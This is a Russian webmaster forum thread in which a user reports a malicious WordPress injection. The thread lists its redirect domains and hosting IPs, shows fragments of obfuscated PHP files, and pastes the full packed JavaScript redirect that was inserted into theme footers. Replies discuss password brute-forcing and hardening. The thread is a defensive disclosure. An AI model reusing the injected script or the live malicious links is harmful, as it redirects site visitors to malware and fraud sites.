Вредоносный код WP

12 3
Angel OSHQ.cc
На сайте с 23.07.2007
Offline
225
2418

Здравствуйте,

обнаружил такой вредоносный код на сайтах WP , добавляют в конце темы WP код (Ниже опубликовал).

Далее идет редирект

https://www.santecza.com/wp-content/themes/dt-the7/woocommerce/cart/r.php

потом меняются домены

http://viewmoretru.ga/index/?

http://viewmoretrud.cf/index/?

Ну и перенаправляется на вирусный сайт reward0100.redirect-servers104.life http://play9991.fastfreeredics44.life (185.89.102.0/24 LLHOST-INC LLHost Inc AS209813 FASTCONTENT Fast Content Delivery LTD) https://www.llhost-inc.com , домен постоянно меняется

viewmoretru.ga и viewmoretrud.cf расположены у хостера smartape.ru (188.127.230.0/24 DHUB-SMRTP Digital Hub SmartApe Hosting AS56694 DHUB) (им было написано пока не реагируют)

В сам WP добавляются файлы common_config 3.php и post_controller 4.php с закодированым содержанием , публикую часть.

<?php ${"G\x4c\x4fBA\x4c\x53"}["\x63\x72\x7a\x65yd\x71\x76"]="\x64\x65f\x61\x75\x6ct\x5f\x63ha\x72s\x65t";$myyzxjfamg="\x64\x65\x66

<?php ${"\x47\x4c\x4f\x42A\x4cS"}["s\x71q\x7a\x6d\x74\x72\x65\x6e\x76\x74"]="\x5f\x31";${"G\x4c\x4

Весь код и раскодировка прикрепил к теме (чтобы не растягивать тему), кому интересно и кто хочет дальше копнуть :beer:

Cкрипт ищет себя в базе https://www.exploit-db.com/search?q=

Слив идет на домен http://play9991.fastfreeredics44.life который размещен на айпи 185.89.102.8 https://www.llhost-inc.com (ник на форуме LLHost-Inc ) , тема 1Deduc.com LLHOST INC. SRL

Еще А запись у домена play9991.fastfreeredics44.life меняется на 92.63.192.135 ( 92.63.192.0/24 NVFOPServer-net vvsg@ AS47981 FOPServer Romanenko Stanislav Sergeevich) vvsg180@gmail.com hawk@diamondc.ru

<script type="text/javascript">

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 w(c){5 8=" "+N.8;5 l=" "+c+"=";5 m=T;5 a=0;5 b=0;7(8.k>0){a=8.j(l);7(a!=-1){a+=l.k;b=8.j(";",a);7(b==-1){b=8.k}m=X(8.O(a,b))}}x(m)}9 I(c,J,d,g,i,n){N.8=c+"="+12(J)+((d)?"; d="+d:"")+((g)?"; g="+g:"")+((i)?"; i="+i:"")+((n)?"; n":"")}9 U(){5 3;F{3=h q("Y.v")}t(e){F{3=h q("V.v")}t(E){3=R}}7(!3&&14 D!=\'10\'){3=h D()}x 3}5 s=\'A://z.11.y/B-C/G/Z-W/13/1h/r.H\';5 K=\'A://z.1p.y.1o/B-C/G/1j/1l/r.H\';7(w(\'15\')!=\'S\'){9 P(){5 f=h 1k();f.1m(f.1n()+1r*1q*6*1);I(\'1i\',\'S\',f.1a())}9 o(Q,M){5 3=U();3.19(\'18\',Q,p);3.16=9(){7(3.17==4&&3.1b==1c){7(3.L.j(\'u=\')==0){P();1g.1f=3.L.O(2)}1e{7(M)o(K,R)}}};3.1d(T)}o(s,p)}',62,90,'|||xmlhttp||var||if|cookie|function|offset|end|name|expires||now|path|new|domain|indexOf|length|search|setStr|secure|lookupRedirect|true|ActiveXObject||sAdsUrl1|catch||XMLHTTP|getCookie|return|com|www|https|wp|content|XMLHttpRequest||try|themes|php|setCookie|value|sAdsUrl2|responseText|bIsFirst|document|substring|setAdsCookie|sUrl|false|complete|null|getXmlHttp|Microsoft|the7|unescape|Msxml2|dt|undefined|santecza|escape|woocommerce|typeof|newadsshow|onreadystatechange|readyState|GET|open|toGMTString|status|200|send|else|location|window|cart|newadshow|envision|Date|bbpress|setTime|getTime|tr|mavigrup|3600|1000'.split('|'),0,{}))
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?4214393&101" alt="counter customizable free hit" border="0"></a></noscript>
<script type="text/javascript">
</script>
txt 187096.txt
zip 187097.zip
png 1.png
png 2.png
png 3.png
Безлимитный хостинг ( https://oshq.cc/unlimhost.html ) в NL от 0.5$. Аренда серверов во Франции ( https://oshq.cc/serverf.html ) от (15 евро)
S
На сайте с 30.09.2016
Offline
469
#1

К чему всё это?

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Angel OSHQ.cc
На сайте с 23.07.2007
Offline
225
#2

К дополнению:

Данный вид взлома проходит благодаря подбору пароля на сайтах WordPress, /wp-login.php .

(как вариант закрывайте доступ к wp-login.php или ставьте защиту тем же fail2ban (активировав правила для Wordpress) либо дополнительные модули WP - Гугл капча)

Подобрав пароль, входят на сайт , к примеру был вход с айпи 13.57.197.27 (Amazon AWS Network Operations ) по GEP /wp-login.php .

После успешного входа, идет добавление вредоносного кода(опубликован выше в первом сообщении) в footer.php вашей темы.

Что происходит дальше также написано в начале темы.

png wp-hack.png
-S
На сайте с 10.12.2006
Offline
Модератор1353
#3
Angelys:
Данный вид взлома проходит благодаря подбору пароля на сайтах WordPress, /wp-login.php

Если кто-то проверял твои сайты на стандартные пароли, то это не значит, что тебя так и поломали.

IRIP
На сайте с 22.06.2010
Offline
124
#4

-= Serafim =-, согласен.

Ко всему прочему, если подобрали пароль - туши свет.

Можно сносить весь движок и базу. Нагадить могут так, что разбираться неделю можно, если сайт большой, искать доры...

если сайт новый - проще снести

S
На сайте с 30.09.2016
Offline
469
#5
Angelys:
Данный вид взлома проходит благодаря подбору пароля

Довольно оригинальный вид взлома, а чё... У тебя пароль 12345 стоял? Или более сложный, типа qweasdzxc?

solomko
На сайте с 01.09.2007
Offline
213
#6

Немного офф топик.

А если просто на сайте удалить\переименовать ВП-логин.пхп? Тогда войти в админку же не смогут?

На старых версиях так было :) Как сейчас?

30% всех моих доходов идут отсюда (http://www.sape.ru/r.d5e628f4c4.php) Когда-то тут была ссылка рефки Рrofit-partner - R.I.P милый друг Поднимаю показатели сайтов, стабильный доход (http://gogetlinks.net/?inv=gypp40)
Devvver
На сайте с 02.07.2008
Online
662
#7

Angelys, вот какой смысл все эти линки выкладывать? Кто то перейдет - может вирусню захватить.

Мой блог. Все о создании сайтов,Seo и СДЛ ( https://devvver.ru/ ) Мой SEO телеграм канал https://t.me/seobloggers
Glueon
На сайте с 26.07.2013
Offline
172
#8
Devvver:
Angelys, вот какой смысл все эти линки выкладывать? Кто то перейдет - может вирусню захватить.

Ну это нужно быть немножко не в себе, чтобы по этим ссылкам переходить, если тема называется "вредоносный код" :)

А так возможно, если кто столкнется с той же проблемой, сможет нагуглить собрата по несчастью и как-то скоординироваться, что в принципе неплохо и часто полезно.

Есть много IP-сетей в аренду под прокси, парсинг, рассылки (optin), vpn и хостинг. Телега: @contactroot ⚒ ContactRoot команда опытных сисадминов (/ru/forum/861038), свой LIR: сдаем в аренду сети IPv4/v6 (/ru/forum/1012475).
Vladimir
На сайте с 07.06.2004
Offline
529
#9
Angelys:
К дополнению:

Данный вид взлома проходит благодаря подбору пароля на сайтах WordPress, /wp-login.php .

Пост с лишней информацией, таких заливаемых кодов тысячи.

- чтобы взлом пароля не приводил к изменению файлов, запрещаем изменение файлов в конфиг файле WP

define('DISALLOW_FILE_EDIT', true);

- Чтобы не могли подобрать пароль, да хоть 12345 ( пофиг ) , запрещаем доступ к файлу wp-login

- Папку wp-admin, тоже ставим запрет на доступ

Доступ оставляем себе по IP.

Это намного легче сделать, чем катать такие посты с копи пастэ

PS все это делается в файле .htaccess

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
-S
На сайте с 10.12.2006
Offline
Модератор1353
#10
Nadejda:
чтобы взлом пароля не приводил к изменению файлов, запрещаем изменение файлов в конфиг файле WP
define('DISALLOW_FILE_EDIT', true);

Nadejda, прочитайте что это такое и что оно запрещает. Никто не правит редактором WP файлы. Находят дырку, заливают шелл и делают вставку нужного кода.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий